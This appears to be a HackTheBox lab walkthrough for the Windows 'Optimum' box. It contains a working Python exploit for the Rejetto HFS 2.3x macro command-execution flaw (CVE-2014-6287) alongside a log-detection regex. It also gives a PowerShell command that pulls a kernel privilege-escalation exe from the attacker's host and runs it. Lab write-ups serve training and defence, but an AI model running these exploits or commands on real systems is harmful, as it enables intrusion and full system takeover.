An easy Windows box from HackTheBox: a public CVE PoC gives initial access, and a second PoC for a kernel bug gives SYSTEM.
Running the usual nmap
sudo nmap -sC -sV -oA nmap/optimum 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.038s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Only port 80 is open, serving Rejetto "HTTP File Server" (HFS) version 2.3, so run searchsploit against it
searchsploit httpfileserver 2.3
And find that there is an RCE for that version, with a Python script
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Download the exploit to the current directory and run it like so, with the target IP, target port and the command to execute
python hfs.py 10.10.10.8 80 "ping 10.10.14.11"
With tcpdump listening for pings
sudo tcpdump icmp
The one from searchsploit didn't work, but another Python script off Exploit-DB did, and it had a reverse shell baked in as well. Now we have a shell on the system as "kostas".
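As an added example (this is not the writeup's script or either Exploit-DB PoC), here is a Python 3 version of the request those PoCs send to HFS 2.3x, plus a check for the same pattern in web logs. It assumes an unpatched Rejetto HFS 2.3x (fixed in 2.3c) that URL-decodes the ?search= parameter and then evaluates {.macro.} templates in it; the function names, the host/port/command and the sample log lines are constructed for the example.

```python
#!/usr/bin/env python3
"""HFS 2.3x search-macro command execution (CVE-2014-6287): request builder
plus a log check for the same pattern.

Added example for this writeup, not the PoC the author ran. Assumes an
unpatched Rejetto HFS 2.3x (fixed in 2.3c) that URL-decodes ?search= and
then evaluates {.macro.} templates found in it.
"""
import re
import sys
import urllib.parse
import urllib.request

# HFS evaluates {.name|args.} macros. In 2.3x before 2.3c a NUL (%00) at the
# start of the search term ends the string for the search code, but the macro
# parser still scans past it, so {.exec|<command line>.} gets executed.
MACRO_TEMPLATE = "%00{{.exec|{cmd}.}}"


def hfs_exec_url(host: str, port: int, cmd: str) -> str:
    """Build the GET URL that makes HFS run `cmd` via the exec macro.

    The command line is percent-encoded (spaces -> %20) so it survives the
    HTTP layer; HFS decodes it before evaluating the macro. The %00 stays a
    literal percent escape in the URL, it must not be a Python NUL byte.
    """
    encoded = urllib.parse.quote(cmd, safe="")
    return f"http://{host}:{port}/?search=" + MACRO_TEMPLATE.format(cmd=encoded)


def hfs_exec(host: str, port: int, cmd: str, timeout: float = 5.0) -> int:
    """Send the request and return the HTTP status.

    exec is blind: HFS serves its normal search page whatever the command
    did, so confirm execution out of band (a ping caught by the tcpdump icmp
    listener, as in the writeup).
    """
    with urllib.request.urlopen(hfs_exec_url(host, port, cmd), timeout=timeout) as resp:
        return resp.status


# Defender side: the same payload as it appears in an HTTP access log.
# Matches search=%00 followed, raw or percent-encoded, by a macro opener "{.".
HFS_MACRO_RE = re.compile(r"[?&]search=%00[^&\s]*(?:\{\.|%7B(?:\.|%2E))", re.IGNORECASE)

# Constructed sample lines in a generic access-log format (not from the box).
SAMPLE_LOG = [
    '10.10.14.11 - - [18/Mar/2017:10:00:00 +0000] "GET /?search=%00{.exec|ping%2010.10.14.11.} HTTP/1.1" 200 -',
    '10.10.14.11 - - [18/Mar/2017:10:00:01 +0000] "GET /?search=readme HTTP/1.1" 200 -',
    '10.10.14.11 - - [18/Mar/2017:10:00:02 +0000] "GET /?search=%00%7B.exec%7Ccalc.exe.%7D HTTP/1.1" 200 -',
    '10.10.14.11 - - [18/Mar/2017:10:00:03 +0000] "GET /?search=%00 HTTP/1.1" 200 -',
]


def find_macro_injections(lines):
    """Return the log lines that carry an HFS search-macro injection."""
    return [line for line in lines if HFS_MACRO_RE.search(line)]


if __name__ == "__main__":
    # Same calling convention as the writeup: <host> <port> "<command>"
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <host> <port> <command>")
    host, port, cmd = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    print("sending:", hfs_exec_url(host, port, cmd))
    print("HTTP", hfs_exec(host, port, cmd))
```

A practical note on "the PoC didn't work": the searchsploit copy of that "(3)" exploit is Python 2 (urllib2, print statements) and, as its own usage text says, expects you to edit the attacker IP and port variables inside the file, serve nc.exe over HTTP from your box and have a listener waiting; with none of that in place it fails silently, which is usually the real reason rather than the box being patched.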
Get the system info of the machine with systeminfo and save the output to a text file (sysinfo here), then run it through Windows Exploit Suggester (wes-ng) after updating its definitions
wes -u
wes sysinfo
which reports the system as vulnerable to MS16-098
Download the exe exploit (41020.exe) from GitHub, host it on the attacking box, pull it onto the target with PowerShell, then execute it
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
And we are now SYSTEM!